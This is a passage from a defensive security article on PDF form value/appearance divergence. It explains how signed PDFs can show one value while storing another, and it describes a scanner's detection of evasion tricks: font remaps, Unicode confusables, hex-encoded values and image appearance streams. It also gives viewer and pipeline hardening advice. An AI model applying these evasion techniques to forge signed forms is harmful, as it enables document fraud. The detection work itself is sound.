XFA rendering divergence. XFA forms render through a separate engine (Adobe’s AXTE/XSLT pipeline) distinct from AcroForm rendering. V/AP analysis does not directly apply to XFA-native fields, which carry their own data/display separation in the XDP schema.
No broad corpus validation. See the “Validation Scope” subsection above. The empirical gap is acknowledged explicitly, not papered over.

Two evasion paths that were previously limitations are now detected: custom font encoding remaps are resolved via /Encoding /Differences table parsing before comparison; image-based AP streams are flagged structurally when a Do operator is present without text drawing operators (the actual image content cannot be compared without image recognition, but the structural anomaly is surfaced for manual review).

Adversarial Evasion Paths

An attacker who knows the detection logic can attempt to evade it. Being explicit about viable evasion paths is more useful than avoiding the topic:

Evasion technique	How it works	Detected?
Font encoding remap (E3)	AP stream has `(1200.00) Tj`; custom `/Font` maps glyph `0x31` (“1”) to the visual glyph for “9” via `/Encoding /Differences [49 /nine]`. Viewer renders 9200.00. Naive text extraction reads 1200.00 — matches `/V`. No mismatch without glyph table resolution.	Confirmed detected — `E3_font_remap_evasion.pdf` re-scanned after fix; [HIGH] Value/Appearance Mismatch fired. The scanner resolves `/Encoding /Differences` tables before comparison: byte 0x31 → glyph `/nine` → “9”, so rendered text 9200.00 is correctly compared against `/V 1200.00`. Deception 75 → high-risk.
Image-based AP (E4)	AP stream draws a rasterised image via `Do` operator with an XObject. `/V` holds text. No text operators to extract.	Structurally detected — `E4_image_ap_structural.pdf` scanned; [HIGH] “Image-Based Appearance Stream — V Not Visually Verifiable” fired. Deception 25 → suspicious. The actual image content cannot be compared to `/V` without image recognition, but the structural anomaly (Do present, no Tj/TJ) is deterministic and surfaced for manual review.
Unicode confusables (E2)	AP renders аpproved (Cyrillic U+0430 “а”); `/V` is `(approved)` (Latin “a”). Bytes differ; visual appearance is identical.	Confirmed detected — `E2_unicode_confusable.pdf` scanned; [HIGH] Value/Appearance Mismatch fired. Deception 25 → suspicious.
Hex-encoded `/V` (E1)	`/V <52656a6563746564>` encodes “Rejected”. Naive string comparison reads angle-bracket hex, not decoded text; mismatch against AP rendering “Approved” is missed.	Confirmed detected — `E1_hex_v_evasion.pdf` scanned; [HIGH] Value/Appearance Mismatch fired. Hex decode and UTF-16BE detection verified. Deception 25 → suspicious.
Whitespace normalisation tricks	AP renders `(Amount: $1,200)` with double-space; `/V` is `(Amount: $1,200)`. After whitespace normalisation, strings match; mismatch is not flagged.	No for genuine whitespace variance, which is common in legitimately authored forms. Flagging it would produce false positives on real documents.
Encrypted AP stream	PDF is encrypted; AP decompression requires the document key. Without the password, AP content is inaccessible.	No — acknowledged; checks apply only to unencrypted or decrypted content.

Font encoding remap and image-based AP were previously undetectable evasion paths; both are now addressed. Font encoding is resolved via glyph table lookup before comparison; image-based AP is flagged structurally so it reaches manual review. Encrypted AP and XFA rendering remain outside static analysis scope. All three remaining gaps require either the document key, a full rendering engine, or both — none are addressable with static byte-stream inspection alone.

An Open Question: DocMDP P=2 and Incremental Form Fill-ins

DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other modification. The interaction between P=2 and incremental form fill-ins is an area that warrants careful consideration. The specific edge case: a viewer that fills a form field incrementally under P=2, updating /V in the incremental section, is permitted. A viewer that also regenerates the /AP stream in the same incremental section may or may not be considered a permitted modification depending on whether the validator treats AP regeneration as a document change.

The practical consequence: a certified P=2 document could have been legitimately filled, producing an incremental /AP update that some validators accept and others reject. A conservative implementation flags all incremental object additions under P=2 that contain form elements as potential violations. Whether a specific update is legitimate depends on whether it was generated by a compliant form-fill operation or by an attacker modifying fields outside the permitted scope. This is a known nuance, not a confirmed false positive, and the spec does not resolve it unambiguously.

Current scanner behaviour: All incremental updates that contain form elements (/Widget annotations or /AcroForm entries) under a P=2 DocMDP constraint are flagged as potential constraint violations. This is intentionally conservative — the flag surfaces the condition for manual review. Whether a specific incremental update represents a legitimate form fill-in or an out-of-scope modification requires context that static analysis alone cannot determine. Corpus data: 1 of 196 scanned files triggered a FieldMDP Bypass indicator — a US congressional bill (BILLS-116s3548is, US Senate 116th Congress) that carries incremental updates containing form elements after a FieldMDP certification signature; scored 601 (false positive). All 44 IRS forms and both VA agency forms produced zero MDP bypass indicators.

Safe Handling and Configuration

The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.

For Individuals: Viewer Settings

Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it. JS is only required for complex field validation and multi-step wizards.
Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
Open in a browser for untrusted files: Chrome and Firefox open PDFs in pdf.js or the built-in renderer without executing Acrobat JavaScript. This does not prevent V/AP divergence from affecting the display, but it eliminates the JavaScript execution surface entirely.
Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by checking document properties or exporting form data as FDF/XFDF and comparing to what you see.

For Developers and Pipelines

Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the AcroForm dictionary — not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs.
Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values.
Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match.
Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads /V and posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.

For Enterprise and IT

Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.

Detection Methodology Reference

The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.

Structural check	What it finds	Severity conditions
`/NeedAppearances true`	AP streams are stale by construction — viewer regenerates from `/V` at open time	Medium alone; Critical when a digital signature is also present
Checkbox/radio `/V` vs `/AS` key comparison	Stored data value and displayed appearance state structurally disagree	High; Critical when inside a signed byte range
AP stream text extraction (text fields)	`Tj`/`TJ` operators reconstructed and compared to `/V`; literal and hex-string encoding handled	High; Critical when signed
AP stream text extraction (listbox/combobox)	Multi-select array extraction; `/Opt` export→display map resolved before comparison to prevent false positives on choice fields	High; Critical when signed
Blank AP stream	AP stream present but contains no text drawing operators — value in file, field renders blank	Medium
Missing AP (`/V` set, no `/AP`)	Display is viewer-defined via `/DA` — not statically present in the file	Medium
Field-value seeding in JS behavioral analysis	`doc.getField()` stub receives real `/V` values; conditional exploitation chains that gate on field content are correctly followed	Applies to any JS indicator elevated by field-value conditioning
DocMDP P=1 + DSS-only incremental update	Incremental section contains `/DSS`/`/VRI` and no execution vectors, annotations, or form elements — permitted under ISO 32000-2 §12.8.2.2	Low (informational); Full bypass severity if DSS is mixed with execution vectors

PDF has accumulated three decades of features with no removal path, and the complexity around those features is the context for everything above. The checks above are designed to avoid false positives on legitimately authored documents; the /Opt export-value resolution and hex-string /V handling were added specifically to handle valid authoring patterns that naive string comparison would misread. Edge cases are possible; the structural indicators raise questions, not verdicts.

Run the scanner against a PDF →

Frequently Asked Questions

What is V/AP divergence in PDF AcroForm fields?

In a PDF AcroForm, every field stores its value in two independent locations: /V (the machine-readable data value read by JavaScript, form submission engines, and digital signature byte-range hashing) and /AP /N (the appearance stream the PDF viewer renders as pixels on screen). These stores are not derived from each other. V/AP divergence occurs when they disagree — the viewer displays one thing while the machine-readable value contains another. A digital signature can certify both while they structurally disagree.

Can a digitally signed PDF show different values to a human and to automated processing?

Yes. A digital signature certifies a byte range covering both /V and /AP. If an author sets /V to one amount and authors an /AP stream rendering a different figure, both are inside the certified byte range. The human signer sees what /AP renders; any JavaScript, form submission, or downstream automated system reads /V. The signature remains valid because the byte range is intact — it certifies content that structurally disagrees within itself.

What does `/NeedAppearances true` mean for a digitally signed PDF?

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer regenerates appearance streams from /V field values at document open time — the /AP streams stored on disk are stale by construction. Combined with a digital signature, the byte-range hash covers the stale /AP, but the viewer regenerates the appearance from /V after opening. The provenance of what is displayed and what was certified is always structurally different.

How can V/AP divergence be detected without rendering the PDF?

Five static checks operate directly on the raw PDF object model: (1) /NeedAppearances detection via regex against the AcroForm dictionary; (2) Checkbox and radio /V vs /AS key comparison — a pure string comparison of two name objects; (3) AP stream text extraction — decompress the /AP /N content stream, parse Tj/TJ operators, PDF-unescape and whitespace-normalise, compare to /V with hex-string decoding and /Opt export-value resolution; (4) Blank AP stream detection; (5) Missing AP detection. None require opening the file in a viewer.

What is DocMDP P=1 and why does the DSS/LTV exemption matter?

DocMDP P=1 is a certifying signature permission level that prohibits all modifications to a PDF after signing. ISO 32000-2 §12.8.2.2 NOTE 2 explicitly exempts DSS (Document Security Store) and LTV (Long Term Validation) additions — these carry OCSP responses, CRLs, and certificate chains needed to validate the signature long after the signing certificate’s OCSP responder may be offline. A scanner that flags all incremental updates under P=1 as bypass attempts will produce false positives on every legitimately LTV-enabled document.

What is the difference between a PDF form field’s `/V` value and its `/AP /N` appearance stream?

/V is the field’s machine-readable value — read by JavaScript (doc.getField().value), included in form submissions, and covered by the digital signature byte-range hash. /AP /N is a self-contained PDF content stream the viewer renders as pixels — it is what the user sees on screen. The two are authored independently, are not derived from each other, and only the viewer reads /AP. Everything else — JavaScript, submission engines, signature validators — reads /V.

How does JavaScript field-value conditioning work as a PDF attack technique?

A malicious PDF can contain OpenAction JavaScript that reads a form field value and conditionally launches a URL or posts data only when that value matches a specific string such as ‘approved’. If a behavioral sandbox returns empty strings for all getField() calls — the natural default when field enumeration and JS emulation run as independent passes — the conditional is never satisfied and the sandbox reports clean. Correct detection requires seeding the JS emulator with real /V values extracted from the AcroForm field dictionaries before execution.

Which PDF authoring tools produce legitimate `/NeedAppearances true` documents?

Programmatic form-fill workflows that update /V but defer /AP regeneration legitimately produce /NeedAppearances true documents — including mail-merge pipelines, PDF form-fill libraries, and e-signature platforms (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; observed behavior, not vendor-documented) that prioritise speed over appearance-stream completeness. On its own, /NeedAppearances true is a medium-severity finding. The critical signal is /NeedAppearances true combined with a digital signature, which is rarely produced by legitimate tooling. Running qpdf --generate-appearances before signing eliminates the condition by rebuilding all AP streams from current /V values.

Research References

C. Mainka, V. Mladenov, S. Rohlmann, J. Schwenk. “Shadow Attacks: Hiding and Replacing Content in Signed PDFs.” Proceedings of the Network and Distributed System Security Symposium (NDSS) 2021 and extended presentation at ACM CCS 2021. Disclosed to 28 vendors; resulted in patches from Adobe, Foxit, LibreOffice, and others.
ndss-symposium.org
J. Müller, V. Mladenov, J. Somorovsky, J. Schwenk. “PDF Insecurity” series (2017–2019). Systematic study of signature-validation weaknesses across viewers and libraries. Introduced the Universal Signature Forgery and incremental-save attack classifications.
pdf-insecurity.org
ISO 32000-2:2020. Document management — Portable Document Format — Part 2: PDF 2.0. International Organization for Standardization, Geneva, Switzerland. §12.8.2.2 (DocMDP), §12.7.3 (AcroForm), §12.7.4 (Field types and /V semantics), §12.7.8 (XFA forms — deprecated in PDF 2.0).
ETSI EN 319 132-1 V1.2.1 (2019). Electronic Signatures and Infrastructures (ESI) — XAdES digital signatures — Part 1: Building blocks and XAdES baseline signatures. European Telecommunications Standards Institute. The PAdES equivalent, ETSI EN 319 102-1, defines the DSS/LTV addition workflow that ISO 32000-2 §12.8.2.2 NOTE 2 permits under DocMDP P=1.
ETSI EN 319 102-1 (PDF)
MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment. Documents the operational use of malicious file attachments, including PDF-delivered payloads, as an initial-access technique. Relevant to the threat-spectrum context in this article: the majority of malicious PDFs observed in the wild are spearphishing attachments that do not rely on AcroForm field manipulation.
attack.mitre.org/techniques/T1566/001
UK National Cyber Security Centre. “Pattern: Safe Import.” NCSC Guidance. Describes the content-disarm-and-reconstruct (CDR) approach to untrusted document import: strip active content, rebuild the file from validated structure. The multi-layer sanitization philosophy in this article (strip, flatten, rasterise as ordered trust levels) maps directly to this pattern.
ncsc.gov.uk/guidance/pattern-safe-import
D. Stevens. PDF malware analysis tools and research. Didier Stevens has published practical PDF malware analysis resources including pdfid.py and pdf-parser.py — widely used to enumerate PDF objects, detect JavaScript, identify OpenAction and embedded file streams, and triage suspicious PDFs without rendering.
blog.didierstevens.com/programs/pdf-tools
CVE-2021-28550. Adobe Acrobat and Reader use-after-free (APSB21-29, May 2021). Exploitable via malformed AcroForm structure; remote code execution. CVSS 8.8.
CVE-2021-21017. Adobe Acrobat heap-based buffer overflow in XFA engine (APSB21-09, February 2021). Remote code execution. CVSS 8.8.
CVE-2024-45112. Adobe Acrobat XFA/AcroForm type confusion (APSB24-70, September 2024). Remote code execution; exploitable via a PDF containing both XFA and AcroForm structures. CVSS 8.6.
CVE-2023-21608. Adobe Acrobat use-after-free (APSB23-01, January 2023). Remote code execution via crafted PDF. CVSS 7.8.